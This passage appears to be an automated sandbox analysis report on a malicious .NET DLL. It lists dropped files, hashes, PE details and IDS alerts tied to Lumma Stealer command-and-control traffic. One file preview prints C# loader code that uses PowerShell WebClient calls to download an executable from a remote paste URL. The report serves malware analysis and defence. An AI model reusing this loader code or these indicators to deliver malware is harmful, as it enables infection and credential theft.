SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrsxaunj.nde.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rtlrdxqq.eqw.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlwrwphu.4pp.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wjuks1mu.5zg.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yskoygp4.sbn.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zl5m4w5j.y0x.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.105869404040282
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBHOak7YnqqiHPPN5Dlq5J:+RI+ycuZhN7HOakSiHPPNnqX
MD5:	CA2B6CA8BBC0DAC757816F631F6030A5
SHA1:	7B4528AC85404AD485B656662F0B5E7E55255A92
SHA-256:	494474A54A1F5CD4F23D2AA6FF2513AD3AD5C78F397C3D0E2CBC369C4DE935B2
SHA-512:	E2A4825618E0B4C902C215D3C382A758B991AABFF6BEA758298A45722C4138BA59829DB20E5DBC291FB13022933D147A14060D247810A73BB670648CA89562CF
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.u.q.g.i.n.2.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.u.q.g.i.n.2.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	3608
Entropy (8bit):	4.674309527372753
Encrypted:	false
SSDEEP:	96:JoOUVpkXLZArHN58uJlPmqDXz9dkLMqF/E:qpk7QlRDXppEM
MD5:	9328E9B30EB919743B2E9739999335C3
SHA1:	E6CE274A36E5F78A2F46A6B92F534755E3938261
SHA-256:	3720A26EE04FADC5ECDC14C9FBF7A1C75AEA6F58029E1F6879CE9CAB8A0FAAB7
SHA-512:	79707E84492961B29C44F820F137E9D607F0DE5392C052018E79541754D412F5B798ADE0A6C621E17D7747FD385F913EAE4B077986612F984B31885E6919B87E
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs, Author: Joe Security
Preview:	.using System;..using System.Diagnostics;..using System.IO;..using System.Threading;....public class HomeP..{.. public static void GetLoader(string pastebinUrl).. {.. string tempExePath = Path.Combine("C:\\Windows\\Temp", Path.GetRandomFileName().Replace(".", "") + ".exe");.... string psCommandGetLink = "(New-Object System.Net.WebClient).DownloadString('" + pastebinUrl + "')";.... string psCommandDownloadExe = "(New-Object System.Net.WebClient).DownloadFile(" + psCommandGetLink + ", '" + tempExePath + "')";.... using (Process powerShell = new Process()).. {.. powerShell.StartInfo.FileName = "powershell";.. powerShell.StartInfo.Arguments = "-Command \"" + psCommandGetLink + "; " + psCommandDownloadExe + "\"";.. powerShell.StartInfo.RedirectStandardOutput = true;.. powerShell.StartInfo.RedirectStandardError = true;.. powerShell.StartInfo.UseShellExecute = false;.. powerShell.Start

C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	183
Entropy (8bit):	5.03686908344896
Encrypted:	false
SSDEEP:	3:0HXEXA8F+H2R5BJ1Rt+kiE2J5xAIDQbTiQCIFRVRMxTPIt+kiE2J5xAIDQb6x:pAu+H2Lnwkn23fDQ/zxszIwkn23fDQ6
MD5:	9FC0C6FE0D83E7BBFA22689DB8CE21D4
SHA1:	531A71DC7F6D80493ED41CBC938F6474BEB00AEB
SHA-256:	B8F427DA3964F5F43D24129C7D2CF075E976A82A762F415E5F20DB477DC14622
SHA-512:	E661C8A89098A42BD713C10190899D71AE2C2A051A06DD85618C8A6C57711FBD9C5BA917D71E08C1B4A00C6B2C7A19FFE0C01636910B1C555C5D92C15032417C
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs"

C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	3.8193769713643824
Encrypted:	false
SSDEEP:	96:HBvCxpv5oxxZza7g+VU5791c4VFekkhB2xHOKiH:hvCxpGxPzac9W2Eq7o
MD5:	93E2D02C5ED637CE7E0C9D7EE9DDE41B
SHA1:	5E2A1D223211FDF264FBBC51EB02555E710F4A7E
SHA-256:	E28D7572629353E0D11536DB39F7D1FE9B7E3903E6FC1E2598DE6B85C822CA76
SHA-512:	00D10962EBECA4BAA77432D05A18E4FD464DFBF76C2FE7B9827CBAA324FB98BCBEBA2E3771E92EB798163425BE4DFC46238AE0B1641686FECECD04371B63F04E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag...........!..................... ...@....... ....................................@..................................-..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H........#..,............................................................0..M.......r...p(....r!..pr%..po....r'..p(....(.....r1..p.r...p(................r...p.........r...p.........r...p...(.....s......o....r...po.....o...............r...p.........r1..p.........r7..p...(....o.....o.....o.....o.....o.....o.....o.....o.....o.....o.....o.....o....&.o.......,..o.....s.........o.......o.......o.......o......(....o....*.........u..........0..........r;..p(....o.....r...p(....o.....

C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.out

Download File

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	681
Entropy (8bit):	5.2536894768185265
Encrypted:	false
SSDEEP:	12:KJN/qR37LwfcQf8KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdYfff8Kax5DqBVKVrdFAMBJTH
MD5:	47B2D51356086E9692142A2E7D1B3E80
SHA1:	1C39DF01CC247C5BD1437FF0F8C61FD72300CACF
SHA-256:	D9D64FB091F2FA65B6B45F43949EB3AC5BCB3502F5CCE5A0A1E96A210E59C436
SHA-512:	F5F570AC6CFC2C65E66FAA867C14401C5FC3BDA893B9A6DA504AD2CAAFA90F8D657A0382248047AE76252F683266959248C4DD8C8DC1008E5A915B08CA775AAA
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\gdi32.dll

Download File

Process:	C:\Windows\Temp\zbjnkzvo4cc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	462848
Entropy (8bit):	7.1257309071219375
Encrypted:	false
SSDEEP:	12288:aklrtKjg1YBxbVonQXhT0doOFdNreYw3ZJyNnFJ/tPZirx1XTY6jyPCMIExFqJoL:DvKjKYBxbVonQXhT0doOFdNreYw3ZJyO
MD5:	EBC77EA19ED66BC10494A862C694C4D7
SHA1:	BB27DD01C052598DE09C5460FE241CB61BE86DE1
SHA-256:	1287FC59877EDEABFCCCDCB48ADCC0D626A12A4F466F496551859ACD5E8E95C2
SHA-512:	32EAE184B9E13D4501226A24C28EB368ED783662358E2642AD210DD7542F6AF66753554F63EB71292A9238EBBDC4B1FC02F6E9C376584DB6B72E100B8C345F81
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: b.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L...q.@g...........!.........v...............................................@............@.............................\|.......P............................ ......\...............................x...@...............T............................text............................... ..`.rdata...\.......^..................@..@.data...............................@....reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\mxtvcgq32fe.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	716800
Entropy (8bit):	7.765253938991967
Encrypted:	false
SSDEEP:	12288:lhQGkvIZqiNSyk5IztFOZNzrn9fgkkAxjFS10dNy81Dtdd9am6wjYJ6OwUkXoK5b:lhQVJuINzrn53px5ndsGrdn6
MD5:	1D08526FC81B1D62195F4E5DEA52BB6F
SHA1:	CAEAA9D75AF4555ECC6367DD32CD541123C5E5B6
SHA-256:	5AF91198860F878466493A6D92481FCC88D59A182CEC02812CE6B3DCD1F0FA38
SHA-512:	0CA26F2932933B4341D21E62873A818AF13F4AB838DA9A5274EBF5C5AA48653F3675EE805232AA31703E99B8ADADEBFF9AF9B78B59158A68E3D792C0D8070C62
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.@g..............0..............`... ... ....@.. ....................................@..................................&..W.... ..@....................@.......................................................`............... ..H...........m.@.k.a.\.... ......................@....text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B.............`...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\zbjnkzvo4cc.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	716800
Entropy (8bit):	7.765253938991967
Encrypted:	false
SSDEEP:	12288:lhQGkvIZqiNSyk5IztFOZNzrn9fgkkAxjFS10dNy81Dtdd9am6wjYJ6OwUkXoK5b:lhQVJuINzrn53px5ndsGrdn6
MD5:	1D08526FC81B1D62195F4E5DEA52BB6F
SHA1:	CAEAA9D75AF4555ECC6367DD32CD541123C5E5B6
SHA-256:	5AF91198860F878466493A6D92481FCC88D59A182CEC02812CE6B3DCD1F0FA38
SHA-512:	0CA26F2932933B4341D21E62873A818AF13F4AB838DA9A5274EBF5C5AA48653F3675EE805232AA31703E99B8ADADEBFF9AF9B78B59158A68E3D792C0D8070C62
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 26%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...r.@g..............0..............`... ... ....@.. ....................................@..................................&..W.... ..@....................@.......................................................`............... ..H...........m.@.k.a.\.... ......................@....text........ ...................... ..`.rsrc...@.... ......................@..@.reloc.......@......................@..B.............`...................... ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.469300489065123
Encrypted:	false
SSDEEP:	6144:IIXfpi67eLPU9skLmb0b45WSPKaJG8nAgejZMMhA2gX4WABl0uNLdwBCswSbB:dXD945WlLZMM6YFH1+B
MD5:	ABD5C669DCAEEB7E4C351A2B47079F5C
SHA1:	1CE022D3867DB84EBFBCF161FE7E941BBA5E9F7A
SHA-256:	A59226716708389192CD912F7DEB33C76A2D050084B41DC60C6FF050A825E3F2
SHA-512:	2EB4D0061D2936F37B04A4D3D39BF264303F9060C0B8902EA6CCA4549E7FB0FF50A55631DDE72BC1D5E9F90EB4D28CE295E80523EA99CEC64EF8D91DB24E112D
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.,.u.=...............................................................................................................................................................................................................................................................................................................................................{.A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Temp\mxtvcgq32fe.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	712
Entropy (8bit):	3.6494173204838303
Encrypted:	false
SSDEEP:	12:ho8FCwprHPQhujczHYdILcdByWdByWdAdDp:O80csvzYIcnnsDp
MD5:	10DB4D9D8C68553567B8633633AC03AB
SHA1:	79A2EC6FC7BAA65E848A0BD4518555FE98496288
SHA-256:	E9D24B97690FDEDE4FF63B87924CF83EC156EF019B36C8286202523254A6DAD4
SHA-512:	1741A46762C8B4AA15EDBBED9A40C448AEA336087FCA8D8F0A72ECD6CCEEECA5622DC6E76D380942B13967CF8AA35F7B3131713C961C82662D429E0D005449A5
Malicious:	false
Preview:	.Unhandled Exception: System.UnauthorizedAccessException: Access to the path 'C:\Users\user\AppData\Roaming\gdi32.dll' is denied... at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath).. at System.IO.File.InternalDelete(String path, Boolean checkHost).. at System.IO.File.Delete(String path).. at ?????????????????????????????????????????.?????????????????????????????????????????(String ).. at ?????????????????????????????????????????.?????????????????????????????????????????(String ).. at ?????????????????????????????????????????.?????????????????????????????????????????().. at ?????????????????????????????????????????.?????????????????????????????????????????(String[] ).

Static File Info

General

File type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.528272651387934
TrID:	Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80% Win32 Dynamic Link Library (generic) (1002004/3) 44.38% Generic .NET DLL/Assembly (238134/4) 10.55% Win16/32 Executable Delphi generic (2074/23) 0.09% Generic Win/DOS Executable (2004/3) 0.09%
File name:	SystemCoreHelper.dll
File size:	31'744 bytes
MD5:	319c704031bc817ada8882e1a55b330e
SHA1:	30850826f44f8a70659a7b955ca0d06dd158b22a
SHA256:	832d09109784aa6d472af5e1e93a40d9987fa9d85859c1f803180ed20eb3ac80
SHA512:	68d8a5000c5c67b4f8f26ad0100a3e80535e7ca8dfaa0e91dc6f02f2ec063c5b13f8f2dab0a4edc0477bedc81783225d4f6dd4f055935f41dc9f821789a641a8
SSDEEP:	384:aMb1S7mJMqoA4znLa3yMFDHLl39GHPBjCl507RA6i1bjI/rzi4m6celWPUAp2M:aHbNzmCMdlNEkz6ObsjzW/elWPUAL
TLSH:	78E240683DAA415BD073EF712DEB74C9C99E62D2EE05691A0341CF074D12AB0EE52D3D
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5g...........!.....n............... ........... ....................................@.............................(..

File Icon


Icon Hash:	7ae282899bbab082

Static PE Info

General

Entrypoint:	0x10008c2e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67350D88 [Wed Nov 13 20:35:20 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	dae02f32a21e03ce65412f6e56942daa

Entrypoint Preview

Instruction
jmp dword ptr [10002000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xa004	0x28	.sdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8be0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x408	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xe000	0x18	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x6c34	0x6e00	8bdd7b176e539d5d765559fa406dace3	False	0.5095170454545455	data	4.798914048953818	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.sdata	0xa000	0x4a	0x200	0910fa1d5163bed4203d413099acb424	False	0.126953125	data	0.7287618350542742	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc000	0x408	0x600	9ba6b2a86a0fb9758611dc388411c635	False	0.255859375	data	2.3803652684988723	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xe000	0x18	0x200	d206e11aca8ed9674a9e38492ee123ed	False	0.056640625	data	0.15517757530476972	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc058	0x3b0	data			0.3813559322033898

Imports

DLL	Import
mscoree.dll	_CorDllMain

Exports

Name	Ordinal	Address
GetCompiled	0	0x1000205a

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-23T12:47:13.972120+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49731	104.20.3.235	443	TCP
2024-11-23T12:47:15.408983+0100	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	1	192.168.2.4	49734	192.81.132.76	80	TCP
2024-11-23T12:47:15.408983+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49734	192.81.132.76	80	TCP
2024-11-23T12:47:15.677699+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49733	104.20.3.235	443	TCP
2024-11-23T12:47:17.087141+0100	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	1	192.168.2.4	49735	192.81.132.76	80	TCP
2024-11-23T12:47:17.087141+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.2.4	49735	192.81.132.76	80	TCP
2024-11-23T12:47:23.653246+0100	2057646	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (revirepart .biz)	1	192.168.2.4	64241	1.1.1.1	53	UDP
2024-11-23T12:47:25.179692+0100	2057647	ET MALWARE Observed Win32/Lumma Stealer Related Domain (revirepart .biz in TLS SNI)	1	192.168.2.4	49741	172.67.184.174	443	TCP
2024-11-23T12:47:25.179692+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49741	172.67.184.174	443	TCP
2024-11-23T12:47:26.072559+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49741	172.67.184.174	443	TCP
2024-11-23T12:47:26.072559+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49741	172.67.184.174	443	TCP
2024-11-23T12:47:27.796297+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49744	104.21.88.250	443	TCP
2024-11-23T12:47:28.497950+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49744	104.21.88.250	443	TCP
2024-11-23T12:47:28.497950+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49744	104.21.88.250	443	TCP
2024-11-23T12:47:29.882269+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49747	104.21.88.250	443	TCP
2024-11-23T12:47:30.610883+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49747	104.21.88.250	443	TCP
